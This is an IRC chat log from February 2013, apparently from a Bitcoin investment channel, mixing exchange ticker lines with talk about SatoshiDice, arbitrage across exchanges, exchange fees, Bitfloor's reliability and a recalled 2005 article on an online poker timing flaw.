[MPEX] [S.DICE] 145 @ 0.00739499 = 1.0723 BTC [+] Feb 02 01:50:50 has anyone used bitinstant? Feb 02 01:51:04 can you put it somewhere in a text format ? pastebin maybe ? Feb 02 01:51:11 and are they worthwhile? i am interested in the cash deposit method Feb 02 01:51:28 hmmm, might be able to but it is slides...would pdf work? Feb 02 01:51:47 i guess. Feb 02 01:52:01 its a google doc right now...i figured everyone could read it easily Feb 02 01:52:13 bitinstant is solid as far as i hear. Feb 02 01:52:17 hello ShaTwo Feb 02 01:52:28 everyone, this is the bitmillions guy. Feb 02 01:53:37 jeje.. Feb 02 01:53:49 Hi everybody.. Feb 02 01:54:10 we just launched today… http://bitmillions.com Feb 02 01:54:16 the private key decrypts and the public key encrypts? I was certain it was the other way around. Feb 02 01:54:25 Love to ear comment on the site.. Feb 02 01:54:26 depends what you're doing Feb 02 01:54:47 for bitcoin transactions Feb 02 01:54:57 not receiving private messages Feb 02 01:55:15 tbh i have no idea Feb 02 01:55:17 i mean the messages are not really encrypted Feb 02 01:55:28 you are signing the message with the key Feb 02 01:55:41 but i did not want to get into very small dettail Feb 02 01:55:52 since i am assuming a non techie audience lol Feb 02 01:56:08 yeah, but it says the public key encrypts and can be given, and private key unencrypt and must be kept private Feb 02 01:56:18 but in order to send an encrypted message...i would encrypt it using your public key, you would be the only one able to read it Feb 02 01:56:19 tbh, i thought you're signing with their public key. Feb 02 01:56:22 should be private key sign transactions and must be kept private Feb 02 01:56:37 public key verify signature and can be given publicly Feb 02 01:56:56 yes...that is how bitcoin works...i think that section was more about cryptography in general Feb 02 01:57:13 but i can update it to show how it is used in this instance Feb 02 01:57:31 i wanted to explain public key cryptography in as simple terms as possible Feb 02 01:57:37 which is pretty tough Feb 02 01:57:55 especially because i don't want to say "trust me, it works" Feb 02 01:58:13 "math" Feb 02 01:58:18 yes lol\ Feb 02 01:59:01 but overall pretty clear and readable? Feb 02 02:00:38 i'm working on getting bitcoins accepted on this other site too Feb 02 02:01:57 a binary options site Feb 02 02:02:22 url? Feb 02 02:05:25 [MPEX] [S.MPOE] 4321 @ 0.00065619 = 2.8354 BTC [-] Feb 02 02:05:26 [MPEX] [S.MPOE] 7073 @ 0.00065606 = 4.6403 BTC [-] Feb 02 02:06:16 ShaTwo: damn you Feb 02 02:06:17 [MPEX] [S.MPOE] 11700 @ 0.00065606 = 7.6759 BTC [-] Feb 02 02:06:24 your system is very similar to one I have in the works lol Feb 02 02:06:32 and you have a nice site :) Feb 02 02:06:47 Ukto: jeje… really? Feb 02 02:06:55 yeah Feb 02 02:06:59 mine wasnt on a per block basis Feb 02 02:07:02 but very similar Feb 02 02:07:08 pm ? :) Feb 02 02:07:13 Sure Feb 02 02:11:23 ShaTwo: omg the coins falling is loud Feb 02 02:11:25 lol Feb 02 02:12:33 mjr_: LOL Feb 02 02:13:06 ShaTwo you totally have to make your wot Feb 02 02:13:13 i was like "what the..." Feb 02 02:13:20 ;;register Feb 02 02:13:21 (register []) -- Register your GPG identity, associating GPG key with . is a 16 digit key id, with or without the '0x' prefix. Optional argument tells us where to get your public key. By default we look on servers listed in 'plugins.GPG.keyservers' config. You will be given a random passphrase to clearsign with your key, (1 more message) Feb 02 02:14:11 mircea_popescu: I will… I didn't sleep in 40 hours … so I will leave for tomorrow :) Feb 02 02:14:51 some sleep is required. Feb 02 02:14:52 [MPEX] [S.MPOE] 4500 @ 0.00066321 = 2.9844 BTC [+] Feb 02 02:15:35 the site looks good ShaTwo Feb 02 02:16:09 Thanks :) Feb 02 02:18:56 http://i45.tinypic.com/o10irs.jpg Feb 02 02:19:51 Bugpowder quick! it's collapsing! Feb 02 02:20:02 [MPEX] [S.MPOE] 4300 @ 0.00066511 = 2.86 BTC [+] Feb 02 02:20:43 https://bitcointalk.org/index.php?topic=101902.msg1496505#msg1496505 Feb 02 02:20:47 anyone seen that ?! Feb 02 02:21:03 [MPEX] [S.MPOE] 13700 @ 0.00066457 = 9.1046 BTC [-] Feb 02 02:21:05 [MPEX] [S.MPOE] 8727 @ 0.00065606 = 5.7254 BTC [-] Feb 02 02:21:06 [MPEX] [S.MPOE] 30550 @ 0.00065375 = 19.9721 BTC [-] Feb 02 02:22:33 [MPEX] [S.DICE] 5000 @ 0.00732211 = 36.6106 BTC [-] Feb 02 02:25:09 [MPEX] [S.MPOE] 3566 @ 0.00064763 = 2.3094 BTC [-] Feb 02 02:28:10 [MPEX] [S.DICE] 660 @ 0.00732211 = 4.8326 BTC [-] Feb 02 02:28:12 [MPEX] [S.DICE] 240 @ 0.00721781 = 1.7323 BTC [-] Feb 02 02:29:14 [BTCTC] [BTC-BOND] 9 @ 0.0098 = 0.0882 BTC [-] Feb 02 02:30:29 [MPEX] [S.DICE] 200 @ 0.007395 = 1.479 BTC [+] Feb 02 02:30:31 Wow. That's a huge crash. 2% under face value Feb 02 02:30:54 [MPEX] [S.MPOE] 3592 @ 0.00064763 = 2.3263 BTC [-] Feb 02 02:30:56 [MPEX] [S.MPOE] 13208 @ 0.00064703 = 8.546 BTC [-] Feb 02 02:31:26 http://www.youtube.com/watch?v=NOCW6qHfKBw Feb 02 02:32:53 lol .1 btc Feb 02 02:34:06 Mining difficulty futures now on BitFunder: https://bitcointalk.org/index.php?topic=140608.0 Feb 02 02:34:41 Anyone selling DMC shares? Feb 02 02:35:36 a now this is interesting Feb 02 02:36:04 This asset is available for shorting to anyone who provides collateral. Please inquiry on info@coinbr.com about doing so. Escrow at trusted third party is possible. Feb 02 02:36:07 that's kinda vague. Feb 02 02:36:10 so what's the collateral ? Feb 02 02:37:16 [HAVELOCK] [SDICE] 10 @ 0.765 = 7.65 BTC [-] Feb 02 02:37:23 CoinBr.iDiff-O has 0.08 BTC/share, CoinBr.iDiff-E 0.15/share Feb 02 02:37:32 its in description Feb 02 02:37:50 aha so fixed. Feb 02 02:38:02 i think you meant 20th march said february in the btctalk post Feb 02 02:38:37 no, iDiff-O expires in February Feb 02 02:38:48 and iDiff-E in March Feb 02 02:38:51 o i c Feb 02 02:39:16 [HAVELOCK] [SDICE] 34 @ 0.765 = 26.01 BTC [-] Feb 02 02:40:09 how'd you fix the collateral level ? educated guess ? Feb 02 02:40:36 yes, educated guess... hope i can come out with fixed rule in future Feb 02 02:40:51 Hey... Feb 02 02:40:59 well im curious how this works out. Feb 02 02:41:07 I just discovered somethingawful while making a search for bitcoin related stuff... Feb 02 02:41:34 "Bitcoin still exists, and still provides comedy gold!" Feb 02 02:41:50 Seems those guys are aware of EVERYTHING happening in the Bitcoin community... Feb 02 02:43:10 [MPEX] [S.MPOE] 9250 @ 0.00064703 = 5.985 BTC [-] Feb 02 02:43:52 any good quotes ? Feb 02 02:43:59 Anyone ever thought of going there and sealing it? Seems like there's a trolls leakage. Feb 02 02:46:09 Seems they're making fun of scams, Bitcoins and etc. Feb 02 02:46:24 haven't they been forever ? Feb 02 02:47:16 Maybe, idk Feb 02 02:47:21 http://forums.somethingawful.com/showthread.php?threadid=3486823 Feb 02 02:47:34 364 pages of bitcoin related posts and trolling Feb 02 02:48:22 a cool Feb 02 02:48:35 and they're informed enough that some of them are probably lurking around bitcointalk.org posting inane content. Feb 02 02:48:56 [MPEX] [S.MPOE] 8003 @ 0.00065023 = 5.2038 BTC [+] Feb 02 02:52:03 yes someone wrote complaining blogpost about their troll activity on btctalk/reddit Feb 02 02:52:35 http://trilema.com/2013/bitbet-january-2013-statement/ Feb 02 02:56:09 [MPEX] [S.DICE] 1400 @ 0.007395 = 10.353 BTC [+] Feb 02 02:57:56 dividends? or already sent? Feb 02 02:58:25 in a sec. Feb 02 03:00:00 [MPEX] [S.MPOE] 3078 @ 0.00065023 = 2.0014 BTC [+] Feb 02 03:00:01 [MPEX] [S.MPOE] 6964 @ 0.00065026 = 4.5284 BTC [+] Feb 02 03:00:52 has sdice thought about becoming a payment processor as well so that it can take USD emmediately? of course it comes with the headache of other exchanges but with sdice's current exposure in the "real world" it might bring lots of new players aand new bitcoin users Feb 02 03:01:31 gesell, it would need casino license Feb 02 03:01:38 if it touched usd Feb 02 03:01:42 sorry Feb 02 03:01:43 not usd Feb 02 03:01:46 hmm Feb 02 03:01:51 yeah guess that is out of the picture Feb 02 03:01:54 rest of the world? Feb 02 03:02:36 or maybe bitinstant or bitpay should have a sdice quick road Feb 02 03:02:43 for the nonUS world Feb 02 03:02:59 well, gambling is regulated almost everywhere.. easier just to stick to btc Feb 02 03:03:07 guess its all messy. but just looking at how to reduce the barrier from a gambler hearing about sdice and bitcoin, and then going off to figure out how to get started Feb 02 03:03:49 how do online gamblers say, in the EU, deal with this now? getting funds in i mean Feb 02 03:04:57 i'm not gambler, just heard something about skrillex/liberty reserve/etc. basically, e-gold currencies. Feb 02 03:05:01 bank account transfer to one of the exchange... how hard is it, really Feb 02 03:05:21 one time setup and then you're set Feb 02 03:06:14 gesell what would be the benefit ? Feb 02 03:07:01 yeah...bank account transfer Feb 02 03:07:04 additional players Feb 02 03:07:08 $15 Feb 02 03:07:22 then get the joy of paying the fee again on the reverse Feb 02 03:07:26 i hate banks Feb 02 03:07:34 gesell ya but when you have a pizzeria doing great pizza Feb 02 03:07:43 you don't start doing kebab just cause "more players" Feb 02 03:07:43 stick to making pizza Feb 02 03:08:13 good idea to have an easy inroad, but bad idea for them to touch USD Feb 02 03:08:21 [MPEX] [S.MPOE] 1109 @ 0.00065026 = 0.7211 BTC [+] Feb 02 03:08:22 [MPEX] [S.MPOE] 3291 @ 0.00065679 = 2.1615 BTC [+] Feb 02 03:08:23 [MPEX] [S.MPOE] 3291 @ 0.00065679 = 2.1615 BTC [+] Feb 02 03:08:24 mircea_popescu: all true. but if you might contemplate how to make it easier for people that hear your pizza is great but dont come because the path seems complex, to make it less complex Feb 02 03:08:35 lol... almost no fees for Bitcoins. It's fund when you eliminate all the regulations/employees burden on transactions. Feb 02 03:08:45 i know Feb 02 03:08:52 It's fun* Feb 02 03:09:00 i look forward to the day you can get a home loan in bitcoins Feb 02 03:09:07 gesell, be assured they did contemplate. i did too Feb 02 03:09:21 maybe using the contracts feature of bitcoin Feb 02 03:09:37 but it's too big hassle to deal with fiat in realtion to gamblin and securities. i Feb 02 03:09:48 but it's too big hassle to deal with fiat in realtion to gamblin and securities. i'm glad i don't have to Feb 02 03:10:01 derp Feb 02 03:10:06 yeah...avoid the regulation as much as possible, you would probably lose money because of the compliance requirements Feb 02 03:10:31 that is one of the reasons sdice and the others are doing so well, super low overhead, and easy transfer in and out Feb 02 03:11:07 i am going to try bitzino for the first time :) Feb 02 03:11:09 [MPEX] [S.MPOE] 1030 @ 0.00065679 = 0.6765 BTC [+] Feb 02 03:11:11 [MPEX] [S.MPOE] 2789 @ 0.0006568 = 1.8318 BTC [+] Feb 02 03:11:12 [MPEX] [S.MPOE] 2789 @ 0.0006568 = 1.8318 BTC [+] Feb 02 03:12:16 [HAVELOCK] [SDICE] 11 @ 0.765 = 8.415 BTC [-] Feb 02 03:12:18 if i had the exposure that sdice is getting i'd start to try to find ways measure the effect of bitcoin-user-bootstrap friction and process, and then reweigh the hassel of dealing with fiat depending on number of users. I mean consider the profit that MTGox makes and they have to deal with this hassel, and the profits SDice has. the question is if reduced friction for fiat entry to btc to sdice would add a logrythmic increase in profits... Feb 02 03:12:48 i guess he's more focused on stability at the moment, which is fare Feb 02 03:12:57 but i'd still contemplate if this friction could be measured Feb 02 03:13:10 sdice actually makes significantly more than mtgox neh ? Feb 02 03:13:22 mircea_popescu: i think so Feb 02 03:13:43 so then ? why fuck with it Feb 02 03:14:18 i smell a biz school grad Feb 02 03:14:28 because someone else might. because you are going to have competitors coming in that have dealt with fiat hassels for a long time and now adding btc Feb 02 03:14:35 smells like reggae music Feb 02 03:14:36 so if anyone cares im curling that sa thread and will post it w/o all the cruft Feb 02 03:14:53 possibly adnotated or i dunno Feb 02 03:15:36 smells like old liquor when we're out of teen spirits Feb 02 03:15:36 [MPEX] [S.MPOE] 4321 @ 0.00065662 = 2.8373 BTC [-] Feb 02 03:15:37 [MPEX] [S.MPOE] 4279 @ 0.0006568 = 2.8104 BTC [+] Feb 02 03:17:10 [MPEX] [S.MPOE] 4321 @ 0.00064739 = 2.7974 BTC [-] Feb 02 03:17:12 [MPEX] [S.MPOE] 7079 @ 0.00064704 = 4.5804 BTC [-] Feb 02 03:19:12 ahh i like the new mpex. Feb 02 03:19:33 [MPEX] [S.MPOE] 2413 @ 0.00064713 = 1.5615 BTC [+] Feb 02 03:20:20 mpoe-pr meets somethingawful? now that would be something Feb 02 03:20:24 I don't see any difference Feb 02 03:20:29 omg, i love bitzino Feb 02 03:21:41 sed -e :a -e 's/<[^>]*>//g;/ [MPEX] [S.DICE] 400 @ 0.007395 = 2.958 BTC [+] Feb 02 03:21:58 jurov they'd prolly ban her. Feb 02 03:23:17 [HAVELOCK] [SDICE] 4 @ 0.7899999 = 3.16 BTC [+] Feb 02 03:27:04 noticing this small delay sometimes in bitzino blackjack where after i "stand" and the dealer contemplates what he does there is sometimes a long pause, sometimes not. could be nothign but reminds me of an article 10 years ago in 2600mag where someone saw something similar that indicated when when the dealer had 21. actually it would happen whenever it asked him if he wanted to buy insurance. there was a 5 second delay in the dialog if the dealer had 21. Feb 02 03:27:10 [MPEX] [S.DICE] 1562 @ 0.007395 = 11.551 BTC [+] Feb 02 03:27:26 So, like.... 0.00000067 BTC per share this month for S.BBET? Feb 02 03:27:34 the author worked out how to execute that advantage to make oodles Feb 02 03:29:30 Namworld something tiny Feb 02 03:30:10 up, and there is the article (from 2005, hack on paradisepoker.com) http://servv89pn0aj.sn.sourcedns.com/~gbpprorg/2600/paradise_poker.txt Feb 02 03:30:53 [MPEX] [S.MPOE] 4321 @ 0.00065661 = 2.8372 BTC [+] Feb 02 03:30:55 [MPEX] [S.MPOE] 8679 @ 0.0006568 = 5.7004 BTC [+] Feb 02 03:30:56 only if i could derive something such from mpex glitches :P Feb 02 03:32:10 so far i only gathered information it seems to use mysql :) Feb 02 03:32:48 really? mpex? damn i would've thought mircea_popescu rolled with some textfile foo database like a boss Feb 02 03:33:13 [BTCTC] [MININGCO.ETF] 1 @ 0.5 BTC [-] Feb 02 03:33:15 teh webservers are lamps Feb 02 03:33:53 The lamps. Stack em. Feb 02 03:34:17 [HAVELOCK] [SDICE] 1 @ 0.7899999 BTC [+] Feb 02 03:36:19 [MPEX] [S.MPOE] 1786 @ 0.0006568 = 1.173 BTC [+] Feb 02 03:36:21 [MPEX] [S.MPOE] 21 @ 0.00065983 = 0.0139 BTC [+] Feb 02 03:36:22 [MPEX] [S.MPOE] 5693 @ 0.00065984 = 3.7565 BTC [+] Feb 02 03:36:22 [MPEX] [S.MPOE] 5693 @ 0.00065984 = 3.7565 BTC [+] Feb 02 03:36:36 sorry, but gonna paste this one on how the author worked out the advantage due to delay on insurance buy (when dealer has ace showing) and working out time required and money that could be made: Feb 02 03:36:36 "The dealer will have an Ace as his up card approximately once every 13 hands. Four out of 13 times, the dealer will also have a 10 in the hole. This means that you would get to exploit this bug approximately four times every 169 hands (1/13 x 4/13). This translates to a 2.366 percent more favorable situation for the player. Without the exploit, you would expect to lose 56 cents for every $100 bet. So with the exploit, this translates to a 1.778 percent Feb 02 03:37:28 gesell, do you know there was successful doublespend attack to satoshidice? Feb 02 03:37:41 no, oh? nice Feb 02 03:37:48 will go check btctalk Feb 02 03:38:28 mk so where do i pastebin a 10mb textfile ? Feb 02 03:39:23 #eligius Feb 02 03:39:45 :DDDDD Feb 02 03:39:53 lol Feb 02 03:40:02 [MPEX] [S.MPOE] 1908 @ 0.00064713 = 1.2347 BTC [-] Feb 02 03:40:04 [MPEX] [S.MPOE] 2921 @ 0.00064704 = 1.89 BTC [-] Feb 02 03:40:05 [MPEX] [S.MPOE] 3293 @ 0.00064703 = 2.1307 BTC [-] Feb 02 03:40:06 [MPEX] [S.MPOE] 6678 @ 0.00064676 = 4.3191 BTC [-] Feb 02 03:40:34 bitcoin is going to change the field of hacking as much as it does finance Feb 02 03:40:36 lol. why not just put it on webserver? Feb 02 03:43:22 [MPEX] [S.MPOE] 4321 @ 0.00065949 = 2.8497 BTC [+] Feb 02 03:43:24 [MPEX] [S.MPOE] 11679 @ 0.00065984 = 7.7063 BTC [+] Feb 02 03:43:25 [MPEX] [S.MPOE] 11679 @ 0.00065984 = 7.7063 BTC [+] Feb 02 03:45:33 yeah that is true Feb 02 03:45:45 security will be everything... Feb 02 03:46:42 many hackers find 0day and sit on it because publishing wont bring you more money and you already make enough to not care so much. and many companies are horrible about patching and fixing (looking at oracle/java and adobe/flash here). so you sit on it. so, lots of people in this field know that yeah they could pwn xyz companie, grab all the credit cards and then go sell them. but why deal with the hassel of the law. it just requires too much strategizin Feb 02 03:47:02 anyone want seals with club referal? Feb 02 03:47:02 i find it incredible these doods dedicated 2mn words to explaining why btc sucks to themselves. Feb 02 03:47:54 yeah, i think its always the funniest when people spend their time talking about things they don't like/ believe in....like r/atheism Feb 02 03:48:00 so my point is there is going to be a lot more granularity between black market hackers and the norm, whereas today its a much larger jump mentally to go from one side of that to the other Feb 02 03:48:32 i'm not sure about that...i think most people who know linux don't mind doing some L33T haxor stuff now and then Feb 02 03:48:52 because one of the large motivations is curiousity... Feb 02 03:49:33 ok...no one wants referal bonus on seals with clubs... Feb 02 03:49:56 your curosity doesnt end with the technology though. it starts to extend into manipulating feer and reaction to having their security and systems go to sht Feb 02 03:50:12 that is a big leap i agree Feb 02 03:50:19 dividend payment for S.BBET in total sum of 203984160 to a notional float of 3000000 has been issued on February 2, 2013, 1:49 am. Feb 02 03:50:35 but being able to make something funny pop up on a coworkers screen is always fun Feb 02 03:51:05 i guess what i mean is that the motivation to HACK (gain access to a system that is not yours) and the motivations to STEAL are two very different things Feb 02 03:51:27 mjr_: not really. its what drives people in this field, watching the reaction. my point is though that the step from watching something go to sht because it doesnt work or everyones passwords got dumped, to going to watching money go down the dube... the step between those too just got more granular Feb 02 03:51:28 sometimes you get people who have both motivations...sometimes they just have one Feb 02 03:51:36 mjr_: yeah Feb 02 03:51:59 well, that's what i mean, a lot of people hack a system and just change the wallpaper... Feb 02 03:52:03 that is what i mean, they are two different things with huge steps between them and the latter has some pretty clear motivations (black market mentality, edge of the law) Feb 02 03:52:04 mjr: what referall bonus? Feb 02 03:52:18 if you join the site...you can say someone referred you Feb 02 03:52:20 but i already joined Feb 02 03:52:33 yeah, but there's no bonus to join referred Feb 02 03:53:36 yeah, i was offering to give someone here the money if they already had an account Feb 02 03:53:50 Well, BBET dividend got through Feb 02 03:53:54 ie. they could get the bonus Feb 02 03:53:55 2 BTC for the first month Feb 02 03:54:38 wow Feb 02 03:54:48 i've never seen a whole bitcoin Feb 02 03:55:01 i can imagine what that must be like though Feb 02 03:55:13 Feb 02 03:55:27 one day i will finally get around these banks and get some cash on an exchange somewhere Feb 02 03:56:02 mjr_ stick around for when sdice or smpoe distribute Feb 02 03:56:27 i don't have shares :( yet Feb 02 03:56:30 anyone can point me to some abitrage code that deals with volume in orderbooks (calculating prof based on volume of several bids/asks rather than just the lowest/highest which might be really really small bids)? would like to integrate this into the google abitrage spreadsheet https://docs.google.com/spreadsheet/pub?key=0AguYZ5-dWMgfdElhakdHQzhiQXp5emctdjZTNG9qaEE&gid=0 Feb 02 03:56:37 [MPEX] [S.MPOE] 5255 @ 0.00065984 = 3.4675 BTC [+] Feb 02 03:56:39 [MPEX] [S.MPOE] 10645 @ 0.00066043 = 7.0303 BTC [+] Feb 02 03:57:13 ;;ticker Feb 02 03:57:15 BTCUSD ticker | Best bid: 20.30200, Best ask: 20.34999, Bid-ask spread: 0.04799, Last trade: 20.35000, 24 hour volume: 50555.35614816, 24 hour low: 20.15000, 24 hour high: 21.13000, 24 hour vwap: 20.68153 Feb 02 03:57:38 Anyone got DMC shares? Feb 02 03:58:00 I'd like to buy a few around 0.02ish Feb 02 03:59:03 once i get the volume issue settled im going to start to code direct buy and sell code for each exchange, direcly into the mofo'ing spreadsheet ;) Feb 02 03:59:11 get google to be my damn abitrage bot Feb 02 03:59:38 (and yeah, already sent the link before to the code, and will release publicly once it works) Feb 02 03:59:53 [MPEX] [S.MPOE] 1537 @ 0.00066043 = 1.0151 BTC [+] Feb 02 03:59:55 [MPEX] [S.MPOE] 8450 @ 0.00066139 = 5.5887 BTC [+] Feb 02 04:00:02 so you will have to open up accounts on each exchange? Feb 02 04:00:08 mjr_: yeah Feb 02 04:00:29 everyone says its not profitable. want to find out for myself and then just share the spreadsheet so everyone else can as well Feb 02 04:00:45 [MPEX] [S.MPOE] 9558 @ 0.00066523 = 6.3583 BTC [+] Feb 02 04:00:46 [MPEX] [S.MPOE] 2035 @ 0.00066572 = 1.3547 BTC [+] Feb 02 04:01:24 kinda wanting to push it a bit... maybe we'll get close to NYSE where the closer your bot is to the exchange the better :) Feb 02 04:03:09 you'll have to move fiat someday between them, no? Feb 02 04:03:52 jurov: totally. im thinking about this as i go Feb 02 04:04:22 yeah, i think transaction fees are going to kill you Feb 02 04:04:36 if you could use liquidity rebates it might work Feb 02 04:04:38 eh, not really. unless i need instant cash Feb 02 04:04:49 ahh this sa forum thing is lol. Feb 02 04:04:50 mjr_: what are liquidity rebates Feb 02 04:04:52 no i mean you would have paper gains, but then when you need to move it Feb 02 04:04:58 they hate on the rota too. i had no idea. Feb 02 04:05:09 what saa forum thing? Feb 02 04:05:22 usually if you put an order out on the books, thats just sitting there you are "adding liquidity" Feb 02 04:05:37 that is valuable, so on wall street...you get a rebate Feb 02 04:05:41 sa hates on EVERYTHING Feb 02 04:05:50 if you take someone else's offer you are "removing" liquidity Feb 02 04:05:58 so you pay a fee Feb 02 04:06:01 aah Feb 02 04:06:06 Namworld apparently. Feb 02 04:06:19 mjr_: its not obvious to me if this is happening on btc exchanges. doesnt appear so Feb 02 04:06:27 It's about people who have nothing better to do than angst all day about everything. Feb 02 04:06:29 bitfloor did it Feb 02 04:06:37 I'm actually developing a new respect for Mircea Popescu. He's so insufferable that I used to avoid reading anything he wrote but I've been reading his blog a bit lately and the man may be arrogant but he's not stupid. He thinks strategically and it will be kind of interesting to watch him go up against the self-appointed "big players" in the world of Bitcoin commerce. The prospect of seeing someone wipe the floor w Feb 02 04:06:37 ith Charlie Shrem and Roger Ver is pretty appealing. Feb 02 04:06:37 Rassah applied to be an MPEx Rota judge. Feb 02 04:06:37 hmm, okay. why dont the others? Feb 02 04:06:40 and i guess they still do, but i haven't tried yet Feb 02 04:06:48 check that out. i r botharing tham, had no idea even Feb 02 04:07:37 apparently sa hates on everything but me. Feb 02 04:07:51 [MPEX] [S.MPOE] 34666 @ 0.00066572 = 23.0778 BTC [+] Feb 02 04:08:14 i heard some things about bitfloor that make me a little wary, but i think they have the best model for a currency exchange Feb 02 04:08:30 what do you mean by their model? Feb 02 04:08:37 liquidity rebate Feb 02 04:08:40 prolly Feb 02 04:08:44 oh maker/taker Feb 02 04:08:48 what % is it ? Feb 02 04:09:14 i cancelled a bitfloor order hours ago and the funds are still on hold cant make another order with them yet Feb 02 04:09:23 they are extremely flaky always Feb 02 04:09:52 mircea_popescu: i can't seem to remember Feb 02 04:09:56 think its .1% if you add -.4% if you take Feb 02 04:10:11 but mostly i like them cuz you can move cash in and out really easily (i thought) Feb 02 04:10:22 you can link an ing direct checking account and its "supposedly" instant Feb 02 04:10:23 what do you mean by easily? Feb 02 04:10:32 .1% when btc moves 20% in a day ? Feb 02 04:10:38 oh yeah well for the ing its easy Feb 02 04:10:42 yeah, but for a bot Feb 02 04:10:42 [MPEX] [S.MPOE] 7513 @ 0.00066191 = 4.9729 BTC [-] Feb 02 04:10:43 [MPEX] [S.MPOE] 1587 @ 0.00064691 = 1.0266 BTC [-] Feb 02 04:10:44 that is trying to arb Feb 02 04:10:48 that is very nice Feb 02 04:10:57 and it hasn't moved 20% today Feb 02 04:11:07 i very much doubt there's the volume to arb so as to render that meaningful. Feb 02 04:11:10 and over its lifetime i don't think it will always move a lot Feb 02 04:11:16 slippage is probably a degree of magnitude larger order to order Feb 02 04:11:25 you need about 10% price difference usually to arb, causeends up being a good 7-8% moving usd from one exchange to another Feb 02 04:11:33 yeah Feb 02 04:11:35 [MPEX] [S.MPOE] 10190 @ 0.00066572 = 6.7837 BTC [+] Feb 02 04:11:37 [MPEX] [S.MPOE] 7410 @ 0.00066582 = 4.9337 BTC [+] Feb 02 04:11:46 [BTCTC] [BTC-BOND] 7 @ 0.01 = 0.07 BTC [+] Feb 02 04:12:11 but that is what i am saying...since they don't have fees to move money, and since you can make money trading, you could take liquidity on another site and offer it out there Feb 02 04:12:20 best are vouchx to vouchx but then even if there is enough depth on the exchange, aurum wont have the reserves Feb 02 04:12:38 mjr_: just look, you can't make enough. try it, but quit talking about it Feb 02 04:12:49 [MPEX] [S.MPOE] 5100 @ 0.00066582 = 3.3957 BTC [+] Feb 02 04:12:58 BitPay just announced that you can donate to Wikipedia in bitcoins now! Oh, they kinda downplay the one small detail that Wikipedia still doesn't actually accept bitcoin. BitPay decided to set up an escrow account where people can give their bitcoins to BitPay and BitPay gives USD to Wikipedia. They did this without Wikipedia's knowledge or consent but they're acting like it's some huge victory. Oh, and they're making Feb 02 04:12:58 a huge deal of the fact that they are so graciously not charging Wikipedia for this "service." Feb 02 04:13:06 pigeons: i was the one that started it. im playing with it. i hear its not worht it but still gonna learn why Feb 02 04:13:08 um is this even true !? Feb 02 04:14:11 or maybe they asked a wikipedia rep and they said: "yeah, whatever, as long as we receive money" Feb 02 04:14:22 best chance today was 20 bitcoins wanted to buy at the rock for 21 when you could buy them ld buy for 20.60 elsewher Feb 02 04:15:29 bitinstant ends up being 7-8% round trip Feb 02 04:15:42 WellsFargo cash deposits are currently suspended. Due to this account suspension, ACH withdrawals will be delayed as the account is closed. These delays are outside of our control and we apologize for any inconvenience this may cause. We strive to process both USD and BTC in an efficient manner and will continue to do so after these delays are resolved. Feb 02 04:15:55 you can confirm for yourself next time you see an opportunity tell me and ill tell you why it wont work ;) Feb 02 04:16:00 that is from bitfloor by the way...so i guess that might be causing your delay? Feb 02 04:16:50 and the lowest price is always btce- and they are never lower enough even on the rare times there is volume, to break even Feb 02 04:17:24 all the usd deposit and withdrawal methods at btce are 7-8% and they are never that much lower than gox, whoever Feb 02 04:17:52 yeah...i have seen that Feb 02 04:17:56 gox is just so expensive Feb 02 04:18:10 they are expensive, but htye are the cheapest Feb 02 04:18:30 and of course the most volume Feb 02 04:18:56 pigeons: why would it require bitinstant. havent though it through but considered that perhaps one doesnt need instant payout. I guess i've only been looking at the scenerio of "buy btc here, sell over there" but have not thought "get cash back and repeat" Feb 02 04:19:38 assumed the "get cash back and repeat" was not as latency burdened so it could take a long while and be okay Feb 02 04:19:41 in order to reduce fees Feb 02 04:19:46 well when you buy here you have no more cash heree now Feb 02 04:20:03 yeah, so i still made a profit but now im blocked from making more profit Feb 02 04:20:33 until i get it back. but if i add more weight and cash at the start i get blocked less and make more profit, no? Feb 02 04:20:35 well you didnt make a profit till you buy again Feb 02 04:20:39 Gox is only. . 1/2% Feb 02 04:20:54 at the highest teir 1/2% they go lower Feb 02 04:21:14 jborkl: the spread of a bunch of exchange fees here https://docs.google.com/spreadsheet/pub?key=0AguYZ5-dWMgfdElhakdHQzhiQXp5emctdjZTNG9qaEE&gid=2 Feb 02 04:21:16 Yeah, I know.. I don't see that as expensive Feb 02 04:21:16 "Coincidentally, my office was, literally, across the street from the registered address of BFL at the time. It turned out to be an apartment complex, as BFL was a start up and did not have an actual office at the time." Feb 02 04:21:30 lmao. his office was next to the projects Feb 02 04:21:33 but NOT INSIDE THEM!!!1 Feb 02 04:21:36 guess the author. Feb 02 04:22:10 plus the risk of keeping your money at these exchnges is not neglible Feb 02 04:22:29 yes, i plan on using bitfloor to get bitcoins and send them to my wallet right away Feb 02 04:22:38 No, gox is the one I use for that reason Feb 02 04:22:49 Yes I mean Feb 02 04:22:59 pigeons: i think im missing the "you didnt make prof until you buy again". sorry i feel stupid here but could you explain why i have to buy again. i took cash, put it in btc, got cash back + %2, and one week later got that cash in my hand Feb 02 04:23:16 no bitfloor risk is pretty bad, some people think thye are only operating to get enenough to run away again Feb 02 04:23:24 Bit floor still owes a lot of people right.. Feb 02 04:24:22 [MPEX] [S.MPOE] 2734 @ 0.00064691 = 1.7687 BTC [-] Feb 02 04:24:23 [MPEX] [S.MPOE] 1066 @ 0.00064676 = 0.6894 BTC [-] Feb 02 04:25:21 hmmm, not sure Feb 02 04:25:32 but like i said, i don't plan on keeping money in there Feb 02 04:25:34 overnight Feb 02 04:25:42 and they seem to be trying to pay people back Feb 02 04:25:43 i don't know Feb 02 04:26:58 how long does it take for satoshidice to win or lose? Feb 02 04:27:13 few seconds Feb 02 04:27:38 you just keep it overnight, ok dont pick the night they go away Feb 02 04:27:58 no, i don't plan on having money in there overnight is what i was saying Feb 02 04:28:01 and that's 1 hour to get it back in, hope the price doesnt move too much Feb 02 04:28:20 i am not trying to trade, just trying to buy bitcoins Feb 02 04:28:31 can't you just put order next door on -otc? Feb 02 04:28:41 how would i pay? Feb 02 04:28:57 i herd moneypaks are popular there Feb 02 04:29:08 i will look into that, i have no clue what that is Feb 02 04:33:40 [MPEX] [S.DICE] 1000 @ 0.00726718 = 7.2672 BTC [-] Feb 02 04:33:42 [MPEX] [S.DICE] 173 @ 0.007395 = 1.2793 BTC [+] Feb 02 04:34:02 Otc will take moneypak or dwolla. Moneypak, make sure you but it with cash only Feb 02 04:34:11 Buy Feb 02 04:34:13 [MPEX] [S.MPOE] 5524 @ 0.00064792 = 3.5791 BTC [+] Feb 02 04:35:17 where can you buy moneypak? Feb 02 04:35:49 Go to moneypak. Com and look it up. Everywhere around here Feb 02 04:36:21 Go ask in otc and see if anyone wants one and how much Feb 02 04:36:34 First Feb 02 04:37:32 